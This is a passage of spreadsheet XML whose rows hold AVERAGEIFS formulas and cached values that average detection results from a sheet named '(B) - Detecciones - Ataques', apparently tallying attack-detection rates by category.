        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CP$131)
</f>
        <v>0</v>
      </c>
      <c r="AN229" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CP$131)
</f>
        <v>0.5</v>
      </c>
      <c r="AO229" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CP$131)
</f>
        <v>0.5</v>
      </c>
      <c r="AP229" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CP$131)
</f>
        <v>1</v>
      </c>
      <c r="AQ229" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CP$131)
</f>
        <v>0</v>
      </c>
      <c r="AR229" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CP$131)
</f>
        <v>0.5</v>
      </c>
      <c r="AS229" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CP$131)
</f>
        <v>0.5</v>
      </c>
      <c r="AT229" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CP$131)
</f>
        <v>1</v>
      </c>
      <c r="AU229" s="271"/>
      <c r="AV229" s="271"/>
      <c r="AW229" s="271"/>
      <c r="AX229" s="271"/>
      <c r="AY229" s="271"/>
      <c r="AZ229" s="271"/>
      <c r="BA229" s="271"/>
      <c r="BB229" s="271"/>
      <c r="BC229" s="271"/>
      <c r="BD229" s="271"/>
      <c r="BE229" s="271"/>
      <c r="BF229" s="271"/>
      <c r="BG229" s="271"/>
      <c r="BH229" s="271"/>
      <c r="BI229" s="271"/>
      <c r="BJ229" s="271"/>
      <c r="BK229" s="271"/>
      <c r="BL229" s="271"/>
      <c r="BM229" s="271"/>
      <c r="BN229" s="271"/>
      <c r="BO229" s="271"/>
      <c r="BP229" s="271"/>
      <c r="BQ229" s="271"/>
      <c r="BR229" s="271"/>
      <c r="BS229" s="271"/>
      <c r="BT229" s="271"/>
      <c r="BU229" s="271"/>
      <c r="BV229" s="271"/>
      <c r="BW229" s="271"/>
      <c r="BX229" s="271"/>
      <c r="BY229" s="271"/>
      <c r="BZ229" s="271"/>
      <c r="CA229" s="271"/>
      <c r="CB229" s="271"/>
      <c r="CC229" s="271"/>
      <c r="CD229" s="271"/>
      <c r="CE229" s="271"/>
      <c r="CF229" s="271"/>
      <c r="CG229" s="271"/>
      <c r="CH229" s="271"/>
      <c r="CI229" s="271"/>
      <c r="CJ229" s="271"/>
      <c r="CK229" s="271"/>
      <c r="CL229" s="271"/>
      <c r="CM229" s="271"/>
      <c r="CN229" s="271"/>
      <c r="CO229" s="271"/>
      <c r="CP229" s="271"/>
      <c r="CQ229" s="271"/>
      <c r="CR229" s="271"/>
      <c r="CS229" s="271"/>
      <c r="CT229" s="271"/>
      <c r="CU229" s="271"/>
      <c r="CV229" s="271"/>
      <c r="CW229" s="271"/>
      <c r="CX229" s="271"/>
      <c r="CY229" s="271"/>
      <c r="CZ229" s="271"/>
      <c r="DA229" s="271"/>
      <c r="DB229" s="271"/>
      <c r="DC229" s="271"/>
      <c r="DD229" s="271"/>
      <c r="DE229" s="271"/>
      <c r="DF229" s="271"/>
      <c r="DG229" s="271"/>
      <c r="DH229" s="271"/>
      <c r="DI229" s="271"/>
      <c r="DJ229" s="271"/>
      <c r="DK229" s="271"/>
    </row>
    <row r="230">
      <c r="L230" s="570"/>
      <c r="M230" s="570"/>
      <c r="N230" s="570"/>
      <c r="O230" s="570"/>
      <c r="Q230" s="271"/>
      <c r="R230" s="510"/>
      <c r="S230" s="510"/>
      <c r="T230" s="510"/>
      <c r="U230" s="510"/>
      <c r="V230" s="510"/>
      <c r="W230" s="510"/>
      <c r="X230" s="271"/>
      <c r="Y230" s="271"/>
      <c r="Z230" s="271"/>
      <c r="AA230" s="271"/>
      <c r="AB230" s="271"/>
      <c r="AC230" s="271"/>
      <c r="AD230" s="271"/>
      <c r="AE230" s="271"/>
      <c r="AF230" s="271"/>
      <c r="AG230" s="271"/>
      <c r="AH230" s="352" t="s">
        <v>1958</v>
      </c>
      <c r="AI230" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CQ$131)
</f>
        <v>0</v>
      </c>
      <c r="AJ230" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CQ$131)
</f>
        <v>0</v>
      </c>
      <c r="AK230" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CQ$131)
</f>
        <v>0</v>
      </c>
      <c r="AL230" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CQ$131)
</f>
        <v>0</v>
      </c>
      <c r="AM230" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CQ$131)
</f>
        <v>0</v>
      </c>
      <c r="AN230" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CQ$131)
</f>
        <v>0</v>
      </c>
      <c r="AO230" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CQ$131)
</f>
        <v>0</v>
      </c>
      <c r="AP230" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CQ$131)
</f>
        <v>0</v>
      </c>
      <c r="AQ230" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CQ$131)
</f>
        <v>0</v>
      </c>
      <c r="AR230" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CQ$131)
</f>
        <v>0</v>
      </c>
      <c r="AS230" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CQ$131)
</f>
        <v>0</v>
      </c>
      <c r="AT230" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CQ$131)
</f>
        <v>0</v>
      </c>
      <c r="AU230" s="271"/>
      <c r="AV230" s="271"/>
      <c r="AW230" s="271"/>
      <c r="AX230" s="271"/>
      <c r="AY230" s="271"/>
      <c r="AZ230" s="271"/>
      <c r="BA230" s="271"/>
      <c r="BB230" s="271"/>
      <c r="BC230" s="271"/>
      <c r="BD230" s="271"/>
      <c r="BE230" s="271"/>
      <c r="BF230" s="271"/>
      <c r="BG230" s="271"/>
      <c r="BH230" s="271"/>
      <c r="BI230" s="271"/>
      <c r="BJ230" s="271"/>
      <c r="BK230" s="271"/>
      <c r="BL230" s="271"/>
      <c r="BM230" s="271"/>
      <c r="BN230" s="271"/>
      <c r="BO230" s="271"/>
      <c r="BP230" s="271"/>
      <c r="BQ230" s="271"/>
      <c r="BR230" s="271"/>
      <c r="BS230" s="271"/>
      <c r="BT230" s="271"/>
      <c r="BU230" s="271"/>
      <c r="BV230" s="271"/>
      <c r="BW230" s="271"/>
      <c r="BX230" s="271"/>
      <c r="BY230" s="271"/>
      <c r="BZ230" s="271"/>
      <c r="CA230" s="271"/>
      <c r="CB230" s="271"/>
      <c r="CC230" s="271"/>
      <c r="CD230" s="271"/>
      <c r="CE230" s="271"/>
      <c r="CF230" s="271"/>
      <c r="CG230" s="271"/>
      <c r="CH230" s="271"/>
      <c r="CI230" s="271"/>
      <c r="CJ230" s="271"/>
      <c r="CK230" s="271"/>
      <c r="CL230" s="271"/>
      <c r="CM230" s="271"/>
      <c r="CN230" s="271"/>
      <c r="CO230" s="271"/>
      <c r="CP230" s="271"/>
      <c r="CQ230" s="271"/>
      <c r="CR230" s="271"/>
      <c r="CS230" s="271"/>
      <c r="CT230" s="271"/>
      <c r="CU230" s="271"/>
      <c r="CV230" s="271"/>
      <c r="CW230" s="271"/>
      <c r="CX230" s="271"/>
      <c r="CY230" s="271"/>
      <c r="CZ230" s="271"/>
      <c r="DA230" s="271"/>
      <c r="DB230" s="271"/>
      <c r="DC230" s="271"/>
      <c r="DD230" s="271"/>
      <c r="DE230" s="271"/>
      <c r="DF230" s="271"/>
      <c r="DG230" s="271"/>
      <c r="DH230" s="271"/>
      <c r="DI230" s="271"/>
      <c r="DJ230" s="271"/>
      <c r="DK230" s="271"/>
    </row>
    <row r="231">
      <c r="L231" s="570"/>
      <c r="M231" s="570"/>
      <c r="N231" s="570"/>
      <c r="O231" s="570"/>
      <c r="Q231" s="271"/>
      <c r="R231" s="510"/>
      <c r="S231" s="510"/>
      <c r="T231" s="510"/>
      <c r="U231" s="510"/>
      <c r="V231" s="510"/>
      <c r="W231" s="510"/>
      <c r="X231" s="271"/>
      <c r="Y231" s="271"/>
      <c r="Z231" s="271"/>
      <c r="AA231" s="271"/>
      <c r="AB231" s="271"/>
      <c r="AC231" s="271"/>
      <c r="AD231" s="271"/>
      <c r="AE231" s="271"/>
      <c r="AF231" s="271"/>
      <c r="AG231" s="271"/>
      <c r="AH231" s="352" t="s">
        <v>1667</v>
      </c>
      <c r="AI231" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AJ231" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AK231" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AL231" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AM231" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AN231" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO231" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP231" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ231" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AR231" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AS231" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT231" s="549" t="s">
        <v>12</v>
      </c>
      <c r="AU231" s="271"/>
      <c r="AV231" s="271"/>
      <c r="AW231" s="271"/>
      <c r="AX231" s="271"/>
      <c r="AY231" s="271"/>
      <c r="AZ231" s="271"/>
      <c r="BA231" s="271"/>
      <c r="BB231" s="271"/>
      <c r="BC231" s="271"/>
      <c r="BD231" s="271"/>
      <c r="BE231" s="271"/>
      <c r="BF231" s="271"/>
      <c r="BG231" s="271"/>
      <c r="BH231" s="271"/>
      <c r="BI231" s="271"/>
      <c r="BJ231" s="271"/>
      <c r="BK231" s="271"/>
      <c r="BL231" s="271"/>
      <c r="BM231" s="271"/>
      <c r="BN231" s="271"/>
      <c r="BO231" s="271"/>
      <c r="BP231" s="271"/>
      <c r="BQ231" s="271"/>
      <c r="BR231" s="271"/>
      <c r="BS231" s="271"/>
      <c r="BT231" s="271"/>
      <c r="BU231" s="271"/>
      <c r="BV231" s="271"/>
      <c r="BW231" s="271"/>
      <c r="BX231" s="271"/>
      <c r="BY231" s="271"/>
      <c r="BZ231" s="271"/>
      <c r="CA231" s="271"/>
      <c r="CB231" s="271"/>
      <c r="CC231" s="271"/>
      <c r="CD231" s="271"/>
      <c r="CE231" s="271"/>
      <c r="CF231" s="271"/>
      <c r="CG231" s="271"/>
      <c r="CH231" s="271"/>
      <c r="CI231" s="271"/>
      <c r="CJ231" s="271"/>
      <c r="CK231" s="271"/>
      <c r="CL231" s="271"/>
      <c r="CM231" s="271"/>
      <c r="CN231" s="271"/>
      <c r="CO231" s="271"/>
      <c r="CP231" s="271"/>
      <c r="CQ231" s="271"/>
      <c r="CR231" s="271"/>
      <c r="CS231" s="271"/>
      <c r="CT231" s="271"/>
      <c r="CU231" s="271"/>
      <c r="CV231" s="271"/>
      <c r="CW231" s="271"/>
      <c r="CX231" s="271"/>
      <c r="CY231" s="271"/>
      <c r="CZ231" s="271"/>
      <c r="DA231" s="271"/>
      <c r="DB231" s="271"/>
      <c r="DC231" s="271"/>
      <c r="DD231" s="271"/>
      <c r="DE231" s="271"/>
      <c r="DF231" s="271"/>
      <c r="DG231" s="271"/>
      <c r="DH231" s="271"/>
      <c r="DI231" s="271"/>
      <c r="DJ231" s="271"/>
      <c r="DK231" s="271"/>
    </row>
    <row r="232">
      <c r="L232" s="570"/>
      <c r="M232" s="570"/>
      <c r="N232" s="570"/>
      <c r="O232" s="570"/>
      <c r="Q232" s="271"/>
      <c r="R232" s="271"/>
      <c r="S232" s="271"/>
      <c r="T232" s="271"/>
      <c r="U232" s="271"/>
      <c r="V232" s="271"/>
      <c r="W232" s="271"/>
      <c r="X232" s="271"/>
      <c r="Y232" s="271"/>
      <c r="Z232" s="271"/>
      <c r="AA232" s="271"/>
      <c r="AB232" s="271"/>
      <c r="AC232" s="271"/>
      <c r="AD232" s="271"/>
      <c r="AE232" s="271"/>
      <c r="AF232" s="271"/>
      <c r="AG232" s="271"/>
      <c r="AH232" s="352" t="s">
        <v>505</v>
      </c>
      <c r="AI232" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AJ232" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AK232" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AL232" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AM232" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AN232" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO232" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP232" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ232" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AR232" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AS232" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT232" s="549" t="s">
        <v>12</v>
      </c>
      <c r="AU232" s="271"/>
      <c r="AV232" s="271"/>
      <c r="AW232" s="271"/>
      <c r="AX232" s="271"/>
      <c r="AY232" s="271"/>
      <c r="AZ232" s="271"/>
      <c r="BA232" s="271"/>
      <c r="BB232" s="271"/>
      <c r="BC232" s="271"/>
      <c r="BD232" s="271"/>
      <c r="BE232" s="271"/>
      <c r="BF232" s="271"/>
      <c r="BG232" s="271"/>
      <c r="BH232" s="271"/>
      <c r="BI232" s="271"/>
      <c r="BJ232" s="271"/>
      <c r="BK232" s="271"/>
      <c r="BL232" s="271"/>
      <c r="BM232" s="271"/>
      <c r="BN232" s="271"/>
      <c r="BO232" s="271"/>
      <c r="BP232" s="271"/>
      <c r="BQ232" s="271"/>
      <c r="BR232" s="271"/>
      <c r="BS232" s="271"/>
      <c r="BT232" s="271"/>
      <c r="BU232" s="271"/>
      <c r="BV232" s="271"/>
      <c r="BW232" s="271"/>
      <c r="BX232" s="271"/>
      <c r="BY232" s="271"/>
      <c r="BZ232" s="271"/>
      <c r="CA232" s="271"/>
      <c r="CB232" s="271"/>
      <c r="CC232" s="271"/>
      <c r="CD232" s="271"/>
      <c r="CE232" s="271"/>
      <c r="CF232" s="271"/>
      <c r="CG232" s="271"/>
      <c r="CH232" s="271"/>
      <c r="CI232" s="271"/>
      <c r="CJ232" s="271"/>
      <c r="CK232" s="271"/>
      <c r="CL232" s="271"/>
      <c r="CM232" s="271"/>
      <c r="CN232" s="271"/>
      <c r="CO232" s="271"/>
      <c r="CP232" s="271"/>
      <c r="CQ232" s="271"/>
      <c r="CR232" s="271"/>
      <c r="CS232" s="271"/>
      <c r="CT232" s="271"/>
      <c r="CU232" s="271"/>
      <c r="CV232" s="271"/>
      <c r="CW232" s="271"/>
      <c r="CX232" s="271"/>
      <c r="CY232" s="271"/>
      <c r="CZ232" s="271"/>
      <c r="DA232" s="271"/>
      <c r="DB232" s="271"/>
      <c r="DC232" s="271"/>
      <c r="DD232" s="271"/>
      <c r="DE232" s="271"/>
      <c r="DF232" s="271"/>
      <c r="DG232" s="271"/>
      <c r="DH232" s="271"/>
      <c r="DI232" s="271"/>
      <c r="DJ232" s="271"/>
      <c r="DK232" s="271"/>
    </row>
    <row r="233">
      <c r="L233" s="570"/>
      <c r="M233" s="570"/>
      <c r="N233" s="570"/>
      <c r="O233" s="570"/>
      <c r="Q233" s="271"/>
      <c r="R233" s="271"/>
      <c r="S233" s="271"/>
      <c r="T233" s="271"/>
      <c r="U233" s="271"/>
      <c r="V233" s="271"/>
      <c r="W233" s="271"/>
      <c r="X233" s="271"/>
      <c r="Y233" s="271"/>
      <c r="Z233" s="271"/>
      <c r="AA233" s="271"/>
      <c r="AB233" s="271"/>
      <c r="AC233" s="271"/>
      <c r="AD233" s="271"/>
      <c r="AE233" s="271"/>
      <c r="AF233" s="271"/>
      <c r="AG233" s="271"/>
      <c r="AH233" s="352" t="s">
        <v>312</v>
      </c>
      <c r="AI233" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CT$131)
</f>
        <v>0</v>
      </c>
      <c r="AJ233" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CT$131)
</f>
        <v>0.005988023952</v>
      </c>
      <c r="AK233" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CT$131)
</f>
        <v>0.005988023952</v>
      </c>
      <c r="AL233" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CT$131)
</f>
        <v>0.005988023952</v>
      </c>
      <c r="AM233" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CT$131)
</f>
        <v>0</v>
      </c>
      <c r="AN233" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CT$131)
</f>
        <v>0.005988023952</v>
      </c>
      <c r="AO233" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CT$131)
</f>
        <v>0.005988023952</v>
      </c>
      <c r="AP233" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CT$131)
</f>
        <v>0.005988023952</v>
      </c>
      <c r="AQ233" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CT$131)
</f>
        <v>0</v>
      </c>
      <c r="AR233" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CT$131)
</f>
        <v>0.005988023952</v>
      </c>
      <c r="AS233" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CT$131)
</f>
        <v>0.005988023952</v>
      </c>
      <c r="AT233" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CT$131)
</f>
        <v>0.005988023952</v>
      </c>
      <c r="AU233" s="271"/>
      <c r="AV233" s="271"/>
      <c r="AW233" s="271"/>
      <c r="AX233" s="271"/>
      <c r="AY233" s="271"/>
      <c r="AZ233" s="271"/>
      <c r="BA233" s="271"/>
      <c r="BB233" s="271"/>
      <c r="BC233" s="271"/>
      <c r="BD233" s="271"/>
      <c r="BE233" s="271"/>
      <c r="BF233" s="271"/>
      <c r="BG233" s="271"/>
      <c r="BH233" s="271"/>
      <c r="BI233" s="271"/>
      <c r="BJ233" s="271"/>
      <c r="BK233" s="271"/>
      <c r="BL233" s="271"/>
      <c r="BM233" s="271"/>
      <c r="BN233" s="271"/>
      <c r="BO233" s="271"/>
      <c r="BP233" s="271"/>
      <c r="BQ233" s="271"/>
      <c r="BR233" s="271"/>
      <c r="BS233" s="271"/>
      <c r="BT233" s="271"/>
      <c r="BU233" s="271"/>
      <c r="BV233" s="271"/>
      <c r="BW233" s="271"/>
      <c r="BX233" s="271"/>
      <c r="BY233" s="271"/>
      <c r="BZ233" s="271"/>
      <c r="CA233" s="271"/>
      <c r="CB233" s="271"/>
      <c r="CC233" s="271"/>
      <c r="CD233" s="271"/>
      <c r="CE233" s="271"/>
      <c r="CF233" s="271"/>
      <c r="CG233" s="271"/>
      <c r="CH233" s="271"/>
      <c r="CI233" s="271"/>
      <c r="CJ233" s="271"/>
      <c r="CK233" s="271"/>
      <c r="CL233" s="271"/>
      <c r="CM233" s="271"/>
      <c r="CN233" s="271"/>
      <c r="CO233" s="271"/>
      <c r="CP233" s="271"/>
      <c r="CQ233" s="271"/>
      <c r="CR233" s="271"/>
      <c r="CS233" s="271"/>
      <c r="CT233" s="271"/>
      <c r="CU233" s="271"/>
      <c r="CV233" s="271"/>
      <c r="CW233" s="271"/>
      <c r="CX233" s="271"/>
      <c r="CY233" s="271"/>
      <c r="CZ233" s="271"/>
      <c r="DA233" s="271"/>
      <c r="DB233" s="271"/>
      <c r="DC233" s="271"/>
      <c r="DD233" s="271"/>
      <c r="DE233" s="271"/>
      <c r="DF233" s="271"/>
      <c r="DG233" s="271"/>
      <c r="DH233" s="271"/>
      <c r="DI233" s="271"/>
      <c r="DJ233" s="271"/>
      <c r="DK233" s="271"/>
    </row>
    <row r="234">
      <c r="L234" s="570"/>
      <c r="M234" s="570"/>
      <c r="N234" s="570"/>
      <c r="O234" s="570"/>
      <c r="Q234" s="271"/>
      <c r="R234" s="271"/>
      <c r="S234" s="271"/>
      <c r="T234" s="271"/>
      <c r="U234" s="271"/>
      <c r="V234" s="271"/>
      <c r="W234" s="271"/>
      <c r="X234" s="271"/>
      <c r="Y234" s="271"/>
      <c r="Z234" s="271"/>
      <c r="AA234" s="271"/>
      <c r="AB234" s="271"/>
      <c r="AC234" s="271"/>
      <c r="AD234" s="271"/>
      <c r="AE234" s="271"/>
      <c r="AF234" s="271"/>
      <c r="AG234" s="271"/>
      <c r="AH234" s="352" t="s">
        <v>2289</v>
      </c>
      <c r="AI234" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AJ234" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AK234" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AL234" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AM234" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AN234" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO234" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP234" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ234" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AR234" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AS234" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT234" s="549" t="s">
        <v>12</v>
      </c>
      <c r="AU234" s="271"/>
      <c r="AV234" s="271"/>
      <c r="AW234" s="271"/>
      <c r="AX234" s="271"/>
      <c r="AY234" s="271"/>
      <c r="AZ234" s="271"/>
      <c r="BA234" s="271"/>
      <c r="BB234" s="271"/>
      <c r="BC234" s="271"/>
      <c r="BD234" s="271"/>
      <c r="BE234" s="271"/>
      <c r="BF234" s="271"/>
      <c r="BG234" s="271"/>
      <c r="BH234" s="271"/>
      <c r="BI234" s="271"/>
      <c r="BJ234" s="271"/>
      <c r="BK234" s="271"/>
      <c r="BL234" s="271"/>
      <c r="BM234" s="271"/>
      <c r="BN234" s="271"/>
      <c r="BO234" s="271"/>
      <c r="BP234" s="271"/>
      <c r="BQ234" s="271"/>
      <c r="BR234" s="271"/>
      <c r="BS234" s="271"/>
      <c r="BT234" s="271"/>
      <c r="BU234" s="271"/>
      <c r="BV234" s="271"/>
      <c r="BW234" s="271"/>
      <c r="BX234" s="271"/>
      <c r="BY234" s="271"/>
      <c r="BZ234" s="271"/>
      <c r="CA234" s="271"/>
      <c r="CB234" s="271"/>
      <c r="CC234" s="271"/>
      <c r="CD234" s="271"/>
      <c r="CE234" s="271"/>
      <c r="CF234" s="271"/>
      <c r="CG234" s="271"/>
      <c r="CH234" s="271"/>
      <c r="CI234" s="271"/>
      <c r="CJ234" s="271"/>
      <c r="CK234" s="271"/>
      <c r="CL234" s="271"/>
      <c r="CM234" s="271"/>
      <c r="CN234" s="271"/>
      <c r="CO234" s="271"/>
      <c r="CP234" s="271"/>
      <c r="CQ234" s="271"/>
      <c r="CR234" s="271"/>
      <c r="CS234" s="271"/>
      <c r="CT234" s="271"/>
      <c r="CU234" s="271"/>
      <c r="CV234" s="271"/>
      <c r="CW234" s="271"/>
      <c r="CX234" s="271"/>
      <c r="CY234" s="271"/>
      <c r="CZ234" s="271"/>
      <c r="DA234" s="271"/>
      <c r="DB234" s="271"/>
      <c r="DC234" s="271"/>
      <c r="DD234" s="271"/>
      <c r="DE234" s="271"/>
      <c r="DF234" s="271"/>
      <c r="DG234" s="271"/>
      <c r="DH234" s="271"/>
      <c r="DI234" s="271"/>
      <c r="DJ234" s="271"/>
      <c r="DK234" s="271"/>
    </row>
    <row r="235">
      <c r="L235" s="570"/>
      <c r="M235" s="570"/>
      <c r="N235" s="570"/>
      <c r="O235" s="570"/>
      <c r="Q235" s="271"/>
      <c r="R235" s="271"/>
      <c r="S235" s="271"/>
      <c r="T235" s="271"/>
      <c r="U235" s="271"/>
      <c r="V235" s="271"/>
      <c r="W235" s="271"/>
      <c r="X235" s="271"/>
      <c r="Y235" s="271"/>
      <c r="Z235" s="271"/>
      <c r="AA235" s="271"/>
      <c r="AB235" s="271"/>
      <c r="AC235" s="271"/>
      <c r="AD235" s="271"/>
      <c r="AE235" s="271"/>
      <c r="AF235" s="271"/>
      <c r="AG235" s="271"/>
      <c r="AH235" s="352" t="s">
        <v>411</v>
      </c>
      <c r="AI235" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CV$131)
</f>
        <v>0</v>
      </c>
      <c r="AJ235" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CV$131)
</f>
        <v>0</v>
      </c>
      <c r="AK235" s="518">
